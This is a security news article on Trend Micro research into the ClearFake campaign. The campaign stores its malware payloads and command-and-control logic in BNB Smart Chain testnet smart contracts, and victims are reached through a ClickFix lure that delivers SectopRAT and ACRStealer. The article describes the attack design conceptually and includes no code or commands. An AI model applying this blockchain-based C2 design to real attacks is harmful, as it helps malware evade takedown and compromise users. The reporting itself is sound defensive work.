ClearFake Campaign Uses BNB Smart Chain Testnet Smart Contracts for C&C Infrastructure
Trend Micro researchers uncover ClearFake threat actors using immutable smart contracts on the BNB Smart Chain testnet to command and control malware, evading takedown.
Threat actors behind the ClearFake campaign have adopted an innovative technique to host command-and-control infrastructure on the BNB Smart Chain (BSC) testnet, according to new research from Trend Micro's TrendAI team. By storing payload routing instructions inside immutable smart contracts, the attackers have created a resilient communication channel that cannot be seized, sinkholed, or altered by security vendors or law enforcement.
The technique, known as EtherHiding, was first documented by Guardz in October 2023. It involves injecting a JavaScript loader into compromised websites that retrieves malicious next-stage payload data directly from a BSC contract via a standard eth_call request. This approach bypasses traditional URL-based blocking entirely, since no malicious URL exists in any static file. The ClearFake campaign has refined EtherHiding by storing the entire payload JavaScript on-chain rather than just a URL, meaning malicious code is returned in full and executed in the victim's browser without any external hosting.
In the attack chain uncovered by TrendAI, the injected JavaScript on compromised websites queried a series of four smart contracts on the BNB testnet. Each contract served a distinct purpose: Smart Contract A held base64-encoded JavaScript for an anti-analysis dispatcher; Smart Contract B stored a Windows-specific ClickFix overlay; Smart Contract C contained a macOS-specific payload; and Smart Contract D functioned as an on-chain execution tracker that confirmed each victim compromise in real time by polling conversion states.
The attack delivered two simultaneous payloads: SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer. A separate macOS variant was also deployed, with operating system detection routing victims to the appropriate payload. The campaign exploited a ClickFix social engineering overlay to trick users into executing malicious code.
Operating on the BNB testnet offers several operational advantages for cybercriminals. Payload data written to a blockchain cannot be deleted or seized, and it is replicated across thousands of nodes with no central server to take down. Additionally, since testnet BNB has no monetary value and is freely available from public faucets, the infrastructure costs the attackers nothing.
TrendAI researchers identified four distinct smart contract addresses across the attack chain, all originating from a single deployer wallet. The oldest of these contracts was deployed nearly a year before the analysis, confirming that this blockchain-based C&C has been a long-running, actively maintained campaign rather than a one-off experiment. The discovery came from a TrendAI Vision One Managed Detection Response (MDR) case, where a customer organization had one employee browsing a legitimate recreational website and ended up with a multi-stage compromise.
Google's research published in October 2025 confirmed that North Korean state-sponsored actors tracked as UNC5342 have adopted the same blockchain C&C technique, indicating that this method is now being used by nation-state threat actors. The immutable and decentralized nature of blockchain technology presents significant challenges for defenders, as traditional sinkholing and content removal strategies are ineffective against payload data stored on-chain.